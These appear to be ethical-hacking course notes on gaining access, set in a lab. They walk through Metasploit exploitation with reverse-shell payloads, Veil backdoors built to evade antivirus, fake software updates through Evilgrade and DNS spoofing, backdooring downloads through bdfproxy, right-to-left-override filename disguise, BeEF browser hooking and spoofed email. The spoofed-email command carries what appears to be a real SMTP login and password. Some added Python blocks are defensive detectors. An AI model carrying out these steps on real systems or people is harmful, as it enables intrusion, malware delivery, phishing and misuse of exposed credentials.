Gaining Access

Introduction

Everything is a Computer

Two main approaches

Server Side

  • Do not require user interaction; all we need is a target IP

  • Start with information gathering, find open ports, OS, installed services, and work from there

Client Side

  • Require user interaction, such as opening a file or a link

  • Information gathering is key here, create a trojan and use social engineering to get the target to run it.

Server-Side Attacks

  • Need an IP Address

  • Very simple if target is on the same network (netdiscover or zenmap)

  • If target has a domain, then a simple ping will return its IP

  • Getting the IP is trickier if the target is a personal computer, and it might be useless if the target accesses the internet through a network, because the IP will be the router's and not the target's. Client-side attacks are more effective in this case, as a reverse connection can be used.

Basic Information Gathering & Exploitation

  • Try default password

  • Services might be misconfigured, such as the “r” services on ports 512, 513 and 514

  • Some might even contain a back door!

  • Code execution vulnerabilities

Analysing Trojans

  • Check properties of the file

  • Is it what it seems to be?

  • Run the file in a virtual machine and check resources

  • Use an online sandbox service (https://www.hybrid-analysis.com)

Using the Above Attacks Outside the Network

  • All of the server-side and client-side attacks work outside the network.

  • You just need to configure the connection properly.

This can be done using:

  • Port forwarding through the router

  • Installing Kali / tools on the cloud

  • Port forwarding using SSH

  • Tunneling services

Metasploit

Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.

You can search for exploits for the open ports and copy the exploit name from rapid7.com.

  • msfconsole - runs the metasploit console

  • help - shows help

  • show [something] - something can be exploits, payloads, auxiliaries or options.

  • use [something] - use a certain exploit, payload or auxiliary.

  • set [option] [value] - configure [option] to have value of [value]

  • exploit - runs the current task

Example:

msfconsole
use exploit/multi/samba/usermap_script
show options
set RHOST 10.20.14.204
show options
show payloads
set PAYLOAD cmd/unix/reverse_netcat
show options
set LHOST 10.20.14.203
exploit

Nexpose

Vulnerability Management Framework

  • Discover open ports and running services

  • Find vulnerabilities

  • Find exploits

  • Verify them

  • Generate reports

  • Automate scans

Conclusion

The general steps are always the same!

  1. Discover open ports and running services

  2. Find vulnerabilities

  3. Find exploits

  4. Exploit / verify

  5. Report

Client-Side Attacks

  • Use if server side attacks fail

  • Use if the target's IP is probably useless

  • Requires user interaction

  • Social engineering can be very useful

  • Information gathering is vital

Veil - Framework

  • A backdoor is a file that gives us full control over the machine that it gets executed on

  • Backdoors can be caught by Anti-Virus programs

  • Veil is a framework for generating undetectable backdoors

Veil Overview & Generating Backdoor

use 1
list
use 15
set LHOST 10.20.14.213
set LPORT 8080
options
set PROCESSORS 1
set SLEEP 6
generate
rev_https_8080

  • Google nodistribute

  • Upload the file

  • See whether the program is detected by antivirus programs

Listening for Incoming Connections

msfconsole
use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.20.14.213
set LPORT 8080
show options
exploit

Delivery Method

  • Put your backdoor file in /var/www/html in Kali

  • service apache2 start

  • Browse, download and start the exe file on Windows

  • A simple method that won't work in practice; see below

Windows 10 Fake Updates

  • Fake an update for an already installed program

  • Install backdoor instead of the update

  • Requires DNS spoofing + Evilgrade (a server to serve the update)

  1. Download and install Evilgrade

    • Download Evilgrade.zip

    • Go to the downloads and double click evilgrade.zip to uncompress it.

    • Open a terminal and run the following commands:

cd /root/Downloads/evilgrade/
cpan Data::Dump
cpan Digest::MD5
cpan Time::HiRes
cpan RPC::XML
cp -r isrcore /etc/perl

Now the tool will work. It might display an error about Gnu.pm; this is a known bug with evilgrade, and if it annoys you, you can get rid of it by removing that library with the following command:

apt-get remove libterm-readline-gnu-perl

Just make sure you re-install it after you’re done, in case it is needed by other tools:

apt-get install libterm-readline-gnu-perl

  2. Start Evilgrade (./configure)

  3. Check programs that can be hijacked (show modules)

  4. Select one (configure [module])

  5. Set backdoor location (set agent [agent location])

  6. Start Server (start)

  7. Start dns spoofing and handler

# Start evilgrade
cd /opt/evilgrade
./evilgrade

# Once in evilgrade:
show options
configure dap
show options
set agent /var/www/html/backdoor.exe
set endsite www.speedbit.com
show options
start

# Become MITM
bettercap -iface eth0 -caplet /root/spoof.cap
set dns.spoof.all true
set dns.spoof.domains update.speedbit.com
dns.spoof on

# Listen for connections (multi/handler as above)
# Then wait for the user to look for updates

Backdoor Windows 10 Downloads on the Fly

  • Backdoor any exe the target downloads

  • We need to be MITM

  1. Set IP Address in config (leafpad /etc/bdfproxy/bdfproxy.cfg)

proxyMode = transparent
# Windows
HOST = 10.0.2.15

  2. Start bdfproxy (bdfproxy)

cd /opt/BDFProxy
./bdf_proxy.py

  3. Redirect traffic to bdfproxy (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080)

  4. Start listening for connections (msfconsole -r /usr/share/bdfproxy/bdf_proxy_msf_resource.rc)

  5. Start arp spoofing

Protecting Yourself Against Smart Delivery Methods

  • Ensure you’re not being MITMed - use trusted networks, xarp

  • Only download from HTTPS pages

  • Check file MD5 after download - http://www.winmd5.com
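Added example (not from these notes, and not XArp's code) of the check that XArp automates for the "not being MITMed" point above: it parses two constructed `ip neigh` snapshots, a trusted baseline and a current one, and alerts when the gateway's MAC has changed or one MAC answers for several addresses, the two usual signs of ARP spoofing.

```python
import re
from collections import defaultdict

# Constructed `ip neigh` output recorded on a known-good day (the baseline).
BASELINE = """\
10.0.2.1 dev eth0 lladdr 52:54:00:12:35:00 REACHABLE
10.0.2.3 dev eth0 lladdr 08:00:27:8d:c0:4d STALE
"""

# Constructed output taken while a spoofer is active: the gateway address
# now resolves to the same MAC as another host on the LAN.
SUSPECT = """\
10.0.2.1 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.3 dev eth0 lladdr 08:00:27:8d:c0:4d STALE
10.0.2.15 dev eth0 lladdr 08:00:27:aa:bb:cc REACHABLE
10.0.2.99 dev eth0 FAILED
"""

ENTRY = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9a-f:]{17})", re.I)


def parse_neigh(text):
    """Map IP -> lower-case MAC; rows without an lladdr (FAILED) are skipped."""
    table = {}
    for line in text.splitlines():
        m = ENTRY.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def arp_alerts(baseline, current, gateway):
    """Return alerts for a changed gateway MAC and for MACs claiming many IPs."""
    old, new = parse_neigh(baseline), parse_neigh(current)
    alerts = []
    if gateway in old and gateway in new and old[gateway] != new[gateway]:
        alerts.append(f"gateway {gateway} MAC changed: {old[gateway]} -> {new[gateway]}")
    by_mac = defaultdict(list)
    for ip, mac in new.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            alerts.append(f"{mac} answers for {len(ips)} addresses: {', '.join(sorted(ips))}")
    return alerts
```

On a real host, feed it the output of `ip neigh` captured on a trusted day and again now; a baseline is needed because a single snapshot cannot tell which MAC is the legitimate gateway.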

Social Engineering

  • Gather info about the users

  • Build a strategy based on the info

  • Build a backdoor based on the info

Maltego

Maltego is an information gathering tool that can be used to collect information about anything.

  • Target can be a website, company, person, etc.

  • Discover entities associated with target

  • Display info on a graph

  • Come up with an attack strategy

Backdooring any File

  • Combine backdoor with any file - generic solution

  • Users are more likely to run a pdf, image, or audio file than an executable

  • Works well with social engineering

  • How?

    • Use a download and execute payload that would:

      • Download a normal file (image, pdf, etc) and display it to the user

      • Download the evil file and execute it in the background

  • Use autoit to compile the backdoor file

  • Use the right-to-left override character (search for the character in Kali), replace .exe with gpj.exe and paste the special character after the name of the file
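Added example (not from these notes) that checks a downloaded file the way the "Analysing Trojans" section suggests and catches the right-to-left trick just described: it finds bidi control characters in the name, works out which extension the user sees versus the one the OS acts on, and compares the claimed type with the file's leading bytes. The sample names and bytes are constructed.

```python
import unicodedata

# Unicode bidirectional control characters: they change how a name is drawn
# on screen but are ignored when the OS decides what the extension is.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")

# Leading bytes of the file types a user is typically lured into opening.
MAGIC = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG", "pdf": b"%PDF", "exe": b"MZ"}
EXECUTABLE = {"exe", "scr", "com", "bat", "cmd", "ps1", "js", "vbs", "hta"}


def real_extension(name):
    """Extension the OS acts on, with all control characters removed."""
    clean = "".join(c for c in name if c not in BIDI_CONTROLS)
    return clean.rsplit(".", 1)[-1].lower() if "." in clean else ""


def displayed_extension(name):
    """Extension the user sees: text after U+202E (RLO) is rendered reversed."""
    head, rlo, tail = name.partition("\u202e")
    shown = head + tail[::-1] if rlo else name
    shown = "".join(c for c in shown if c not in BIDI_CONTROLS)
    return shown.rsplit(".", 1)[-1].lower() if "." in shown else ""


def content_type(data):
    """File type implied by the first bytes, or 'unknown'."""
    for ext, magic in MAGIC.items():
        if data.startswith(magic):
            return ext
    return "unknown"


def assess(name, data):
    """Return a list of findings; an empty list means nothing looked wrong."""
    findings = []
    controls = [unicodedata.name(c) for c in name if c in BIDI_CONTROLS]
    if controls:
        findings.append("control characters in name: " + ", ".join(controls))
    real, shown = real_extension(name), displayed_extension(name)
    kind = content_type(data)
    if shown != real:
        findings.append(f"shown as .{shown} but the OS will treat it as .{real}")
    if kind != "unknown" and kind != real.replace("jpeg", "jpg"):
        findings.append(f"content is {kind} but extension is .{real}")
    if real in EXECUTABLE:
        findings.append(f".{real} is executable")
    return findings


# Constructed samples: a disguised PE file and a genuine JPEG.
DISGUISED = ("holiday\u202egpj.exe", b"MZ\x90\x00" + b"\x00" * 60)
HONEST = ("holiday.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 60)
```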

Fake Emails

  • Send fake emails

  • Make it look like it's sent from any address

  • Pretend to be a friend, company, boss, etc.

  • Friend - Ask them to open a file (image, pdf, etc.)

  • Support member - ask to login to control panel using fake login page

  • Support member - ask to run a command on a server

  • Ask to visit a normal web page

  • etc.

sendemail -xu jhnwck70@gmail.com -xp CBPr90hgSDUHL2vF -s smtp-relay.sendinblue.com:587 -f "user@company.com" -t "target@company.com" -u "Check out this car" -m "Hey, checkout this car https://url.com/link-to-file-download.jpg" -o message-header="From: Name Surname <name.surname@company.com>"

  • Use attached sendmail.php
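Added example (not from these notes) of the header check a receiving mail server or analyst would run on a message like the one the sendemail command above produces: it compares the Return-Path and Reply-To domains with the From: domain and reads the SPF/DKIM/DMARC verdicts from Authentication-Results. Both messages are constructed, and the relay and domains in them are placeholders.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed message: the relay's envelope sender (Return-Path) does not match
# the forged From: header, and DMARC fails for the claimed domain.
SPOOFED = """\
Return-Path: <user@relay-example.test>
Authentication-Results: mx.example.test; spf=pass smtp.mailfrom=relay-example.test;
 dkim=none; dmarc=fail header.from=company.com
From: Name Surname <name.surname@company.com>
To: target@company.com
Subject: Check out this car

Hey, checkout this car
"""

# Constructed message that really was sent from the claimed domain.
GENUINE = """\
Return-Path: <name.surname@company.com>
Authentication-Results: mx.example.test; spf=pass; dkim=pass; dmarc=pass
From: Name Surname <name.surname@company.com>
To: target@company.com
Subject: Lunch

See you at noon.
"""


def domain(header_value):
    """Domain part of the address in a header value, lower-cased ('' if none)."""
    return parseaddr(header_value)[1].rpartition("@")[2].lower()


def header_findings(raw):
    """Return reasons to distrust the sender; an empty list means none found."""
    msg = message_from_string(raw)
    findings = []
    from_dom = domain(msg.get("From", ""))
    for name in ("Return-Path", "Reply-To"):
        dom = domain(msg.get(name, ""))
        if dom and dom != from_dom:
            findings.append(f"{name} domain {dom} differs from From domain {from_dom}")
    auth = " ".join(msg.get_all("Authentication-Results", []))
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"\b{mech}=(\w+)", auth)
        result = m.group(1).lower() if m else "missing"
        if result != "pass":
            findings.append(f"{mech}={result}")
    return findings
```

Authentication-Results is only trustworthy when added by your own receiving server, so strip any copy that arrived with the message before relying on it.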

Beef Framework

BeEF is the Browser Exploitation Framework; it lets us launch a number of attacks on a hooked target. Targets are hooked once they load a hook URL.

  • DNS spoof requests to a page containing the hook

  • Inject the hook into browsed pages (need to be MITM)

  • Use XSS exploit

  • Social engineer the target to open a hook page

Get the user to browse to your beef page